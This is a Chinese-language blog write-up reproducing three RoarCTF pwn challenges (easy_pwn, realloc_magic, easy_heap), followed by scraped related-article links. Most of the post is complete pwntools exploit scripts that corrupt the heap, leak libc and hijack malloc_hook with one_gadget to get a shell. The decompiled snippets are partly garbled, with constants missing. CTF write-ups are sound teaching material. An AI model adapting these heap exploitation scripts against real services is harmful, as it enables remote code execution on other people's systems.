Roarctf 几道pwn 复现
1、easy_pwn
可以利用的点:
__int64 __fastcall sub_E26(signed int a1, unsigned int a2)
{
__int64 result; // rax if ( a1 > (signed int)a2 )
return a2;
if ( a2 - a1 == )
LODWORD(result) = a1 + ;
else
LODWORD(result) = a1;
return (unsigned int)result;
}
然后 覆盖了 下一个chunk的 size ,然后就是 像之前的0ctf2017的babyheap程序
具体可以参考这里
https://bbs.pediy.com/thread-246786.htm
payload:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
host = "192.168.244.153"
port = 8888
#r = process("")
r = remote(host,port) def add(size):
r.recvuntil("choice: ")
r.sendline(str(1))
r.recvuntil("size: ")
r.sendline(str(size)) def edit(index,size,content):
r.recvuntil("choice: ")
r.sendline(str(2))
r.recvuntil("index: ")
r.sendline(str(index))
r.recvuntil("size: ")
r.sendline(str(size))
r.recvuntil("content: ")
r.sendline(content) def free(index):
r.recvuntil("choice: ")
r.sendline(str(3))
r.recvuntil("index: ")
r.sendline(str(index)) def show(index):
r.recvuntil("choice: ")
r.sendline(str(4))
r.recvuntil("index: ")
r.sendline(str(index)) add(0x68)#
add(0x68)#
add(0x68)#
add(0x68)#
add(0x68)#
add(0x68)#
payload = 'a'*0x68+p8(0xe1)
edit(0,0x68+0xa,payload)
free(1)
add(0x68)#
show(2)
r.recvuntil(": ")
leak = u64(r.recv(6).ljust(8,'\x00'))
libc = leak - 0x3c4b78
print "libc:"+hex(libc)
free_hook = libc +0x3c67a8
malloc_hook = libc +0x3c4b10
ong_a = libc + 0x4526a
realloc_hook = libc +0x846C0
payload = p64(malloc_hook -0x23)
add(0x60)#
free(2)
edit(6,8,payload)
add(0x60)#
add(0x60)#
payload = 'a'*0xb+p64(ong_a)+p64(realloc_hook)
edit(7,len(payload),payload)
add(0x68)
r.interactive()
2、realloc_magic
程序:
int fr()
{
free(realloc_ptr);
return puts("Done");
}
int ba()
{
if ( lock )
exit(-);
lock = ;
realloc_ptr = 0LL;
return puts("Done");
}
int re()
{
size_t size; // [rsp+Ch] [rbp-4h] puts("Size?");
LODWORD(size) = get_int("Size?");
realloc_ptr = realloc(realloc_ptr, (unsigned int)size);
puts("Content?");
read(, realloc_ptr, (unsigned int)size);
return puts("Done");
}
没有malloc ,这道题可以修改tcache的内容,因为tache 就在heap的最上面可以修改几个字节就星
首先 用double free realloc到 tcache去和修改一个chunk的大小,然后free掉 jiu可以 放到unsortbin去接下来就去布局了 继续realloc 的话就会从unsortdbin上扣出来,好像是。。。
既然修改到tcache去,就可以修改tcache 的chunk,这样就可以修改一个tcache中的chunk 指向IO_2_1_stdin去。接下来在用666
接下来就常规操作
我就参考了两个wp
都实现了下
payload:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import random
context.log_level = 'debug'
#host = "192.168.244.158"
host = '127.0.0.1'
port = 8888
#r = process("")
r = remote(host,port) def dele():
r.recvuntil(">> ")
r.sendline(str(2)) def realloc_(size,content):
r.recvuntil(">> ")
r.sendline(str(1))
r.recvuntil("Size?")
r.sendline(str(size))
r.recvuntil("Content?")
r.send(content) def lock_666():
r.recvuntil(">> ")
r.sendline(str(666)) #realloc_(0x70,'a')
#realloc_(0,'')
#realloc_(0x100,'a')
#realloc_(0,'')
#realloc_(0xe0,'a')
#realloc_(0,'a')
#realloc_(0x100,'a')
#[dele() for i in range(7)]
#realloc_(0x0,'')
#realloc_(0x70,'a')
#realloc_(0x180,chr(0)*0x78+p64(0x41)+p16(0x9760-0x43))
#realloc_(0,'')
#realloc_(0x100,'a')
#realloc_(0,'')
#realloc_(0x100,'a'*0x43+p64(0xfbad1887) + p64(0) *3 + "\x00")
#leak=u64(r.recvuntil("realloc")[9:9+6].ljust(8,'\x00'))
#leak=u64(r.recv(6).rjust(8,'\x00'))
#print hex(leak)
#libc = leak - 0x3ed8b0
#lock_666()
#realloc_(0x70,'a')
#realloc_(0,'')
#realloc_(0x110,'a')
#realloc_(0,'')
#realloc_(0xf0,'a')
#realloc_(0,'a')
#realloc_(0x110,'a')
#[dele() for i in range(7)]
#realloc_(0x0,'')
#realloc_(0x70,'a')
#realloc_(0x190,chr(0) * 0x78 + p64(0x41) + p64(libc + 0x3ed8e8))
#realloc_(0x0,'')
#print hex(libc)
#realloc_(0x110,'a')
#realloc_(0,'')
#ong_g = libc + 0x4f322
#realloc_(0x110,p64(ong_g))
#r.sendline(str(2)) realloc_(0x28,'a')
dele()
realloc_(0x68,'n')
dele()
realloc_(0x18,'n')
realloc_(0,'')
realloc_(0x48,'a')
dele()
realloc_(0,'')
realloc_(0x68,'a'*0x18+p64(0x201)+p16(0x7010))
realloc_(0,'')
realloc_(0x48,'s')
realloc_(0,'')
realloc_(0x48,'\xff'*0x38+p64(0x31))
realloc_(0x58, 'a' * 0x18 + ' ' *0x20 + p64(0x41)+p64(0) +p16(0x7050))
realloc_(0,'')
realloc_(0x28,p64(0)*4+p16(0x072d)+p8(0xdd))
realloc_(0,'')
realloc_(0x58,'a'*0x33+p64(0xfbad3c80)+p64(0)*3+chr(0))
leak=u64(r.recvuntil("realloc")[9:9+6].ljust(8,'\x00'))
print hex(leak)
libc = leak - 0x3ed8b0
#realloc_(0,'')
#realloc_(0x1e8,p64(0)*4+p16(0x072d)+p8(0xdd))
#realloc_(0,'')
#realloc_(0x58,'a'*0x13+p64(0xfbad3c80)+p64(0)*3+chr(0))
#result=r.recvn(8)
#realloc_(0x50, 'a' * 0x18 + ' ' * 0x20 + p64(0x201)+ p16(0x7060))
#realloc_(0,'')
#realloc_(0x18,p64(0)+p64(0x1f1)+p16(0x072d)+p8(0xdd))
#realloc_(0,'')
#realloc_(0x28,'a')
#realloc_(0x1e8,'a')
#realloc_(0x1e8,p16(0x072d)+p8(0xdd))
r.sendline(str(666))
realloc_(0x38,p64(0)+p64(libc+0x3ed8e8))
realloc_(0,'')
ong_g = libc+0x4f322
realloc_(0x28,p64(ong_g))
r.sendline('')
r.interactive()
#realloc_(0x50,'p'*0x33+p64(0xfbad3c80)+p64(0)*3+chr(0))
#leak=u64(r.recvuntil("realloc")[9:9+6].ljust(8,'\x00'))
#print hex(leak)
r.interactive()
easy_heap:
这道 只有show了一次就关了 stdou 和stderr
所以 其实就是劫持 bss上的 ,然后可以修改,在bss上伪造一个 unsortbin ,然后释放 就有了libc的地址,但是要用 那个给的realloc的 卡住,就能泄露出来了
我是在本地调试的。
payload:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'
host = "192.168.244.158"
port = 8888 r = remote(host,port) r.recvuntil("please input your username:")
r.sendline('yezi')
r.recvuntil("please input your info:")
r.sendline('lan')
def add2(size,content):
sleep(0.1)
r.sendline(str(1))
sleep(0.1)
r.send(str(size).ljust(8, '\x00'))
sleep(0.3)
r.send(content)
def add(size,content):
r.recvuntil(">> ")
r.sendline(str(1))
r.recvuntil("input the size")
r.sendline(str(size))
r.recvuntil("please input your content")
r.sendline(content)
def free2():
sleep(0.2)
r.sendline(str(2))
def free():
r.recvuntil(">> ")
r.sendline(str(2)) def show():
r.recvuntil(">> ")
r.sendline(str(3)) def e_666(chosn,content):
r.recvuntil(">> ")
r.sendline(str(666))
r.recvuntil("build or free?")
if chosn == 1:
r.sendline(str(1))
r.recvuntil("please input your content")
r.sendline(content)
else:
r.sendline(str(2)) add(0x50,'a')#
add(0x50,'b')#
add(0x50,'c')#
free()
free()
add(0x50,p64(0x602080))
add(0x50,'a')
payload = 0xdeadbeefdeadbeef
add(0x50,p64(0)+p64(0x6020b0)+p64(payload)+p64(0)+p64(0)+p64(0xb1))
e_666(1,'a')
[free() for i in range(7)]
add(0x70,'a')
e_666(0,'a')
add(0x8,'aaaaaaa')
show()
r.recvuntil("\n")
libc = u64(r.recv(6).ljust(0x8,'\x00')) -0x3ebd40
log.info(hex(libc))
malloc_hook = libc + 0x3ebc30
free_hook = libc +0x3ed8e8
system = libc +0x4f440
add2(0x40,'aa')
free2()
free2()
add2(0x40,p64(malloc_hook-0x8))
add2(0x40,p64(malloc_hook-0x8))
#payload = p64(system)
payload = p64(libc+0x4f322)+p64(libc+0x98c30+9)
add2(0x40,payload)
add2(0x40,'touch 1.txt|cat flag > 1.txt')
r.interactive()
参考:https://www.anquanke.com/post/id/188785#h3-6
Roarctf 几道pwn 复现的更多相关文章
- [零基础学IoT Pwn] 复现Netgear WNAP320 RCE
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE 0x00 前言: 这是[零基础学IoT Pwn]的第二篇,上篇我们搭好了仿真环境后,模拟运行了Netgear WNAP320固件 ...
- 强网杯2018 pwn复现
前言 本文对强网杯 中除了 2 个内核题以外的 6 个 pwn 题的利用方式进行记录.题目真心不错 程序和 exp: https://gitee.com/hac425/blog_data/blob/m ...
- D^3ctf两道 pwn
这次 的D^3ctf 又是给吊打 难顶... 所以题都是赛后解出来的,在这感谢Peanuts师傅 unprintableV 看看保护: 看看伪代码,其实代码很少 void __cdecl menu() ...
- 2019CISCN华南线下两道web复现
原帖地址 : https://xz.aliyun.com/t/5558 2019CISCN华南线下的两个简单 web 部分题目下载地址,有的不完整 : 点我点我 web 1 考点 : 无参函数的 RC ...
- [RoarCTF 2019]simple_uplod
目录 [RoarCTF 2019]simple_uplod 1.ThinkPHP文件上传 2.upload()多文件上传 ThinkPHP上传文件名暴破 [RoarCTF 2019]simple_up ...
- [RoarCTF]Easy Java
目录 [RoarCTF]Easy Java 知识点 1.WEB-INF/web.xml泄露 [RoarCTF]Easy Java 题目复现链接:https://buuoj.cn/challenges ...
- [RoarCTF]Easy Calc
目录 [RoarCTF]Easy Calc 知识点 1.http走私绕过WAF 2.php字符串解析特性绕过WAF 3.绕过过滤写shell [RoarCTF]Easy Calc 题目复现链接:htt ...
- HGAME2021 week2 pwn writeup
week2一共有4道pwn题 killerqueen 有格式化字符串漏洞,题不算难,但是故事情节真实让人摸不着头脑,但是仔细分析分析,理清楚逻辑就可以做了. 第一次choose1的时候,可以输入0,泄 ...
- ISCC2016 WriteUp
日期: 2016-05-01~ 注:隔了好久才发布这篇文章,还有两道Pwn的题没放,过一阵子放上.刚开始做这个题,后来恰巧赶上校内CTF比赛,就把重心放在了那个上面. 这是第一次做类似于CTF的题,在 ...
随机推荐
- 列表渲染.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title> ...
- todoList.html
待做的事情 {{item}} 完成 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" ...
- 实战SpringCloud响应式微服务系列教程(第九章)使用Spring WebFlux构建响应式RESTful服务
本文为实战SpringCloud响应式微服务系列教程第九章,讲解使用Spring WebFlux构建响应式RESTful服务.建议没有之前基础的童鞋,先看之前的章节,章节目录放在文末. 从本节开始我们 ...
- leetcode算法小题(1)
题目描述: 给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标. 你可以假设每种输入只会对应一个答案.但是,你不能重复利用这个数 ...
- Mysql 性能优化及问题
MySQL max_allowed_packet设置及问题 查看 max_allowed_packet show VARIABLES like '%max_allowed_packet%'; 以下内容 ...
- 使用memset初始化int数组
memset()是一个来自于string库的函数,正规用法是初始化char类型的数组.因为char类型只占1个字节,memset按字节赋值后,会将char类型数组的所有元素变为你指定的值.但是4字节的 ...
- 使用“反向传播”迭代法求解y=√10
X=√10,求X,也就是求Y=10 =X2 , X是多少. *重要的思想是,如何转化为可迭代求解的算法问题. *解数学问题,第一时间画图,求导,“直线化”. Y = X2 假如已知Y = 10 ,要求 ...
- Java零基础入门面向对象之多态
多态: 多态的概念:一种事物的多种形态:允许不同类的对象对同一消息做出不同的响应 多态的前提:继承,重写:向上转型(父类引用指向子类对象) 多态的作用:提高代码的可用性:降低模块之间的耦合度 多态分类 ...
- 【TCP/IP网络编程】:03地址族与数据序列
上一篇文章介绍了套接字的创建过程,这篇文章主要讨论分配给套接字的IP地址和端口号的相关知识. IP地址和端口号 IP(Internet Protocol,网络协议)地址是收发网络数据而分配给计算机的值 ...
- Java多线程中join、yield、sleep方法详解
在Java多线程编程中,Thread类是其中一个核心和关键的角色.因此,对该类中一些基础常用方法的理解和熟练使用是开发多线程代码的基础.本篇主要总结一下Thread中常用的一些静态方法的含义及代码中的 ...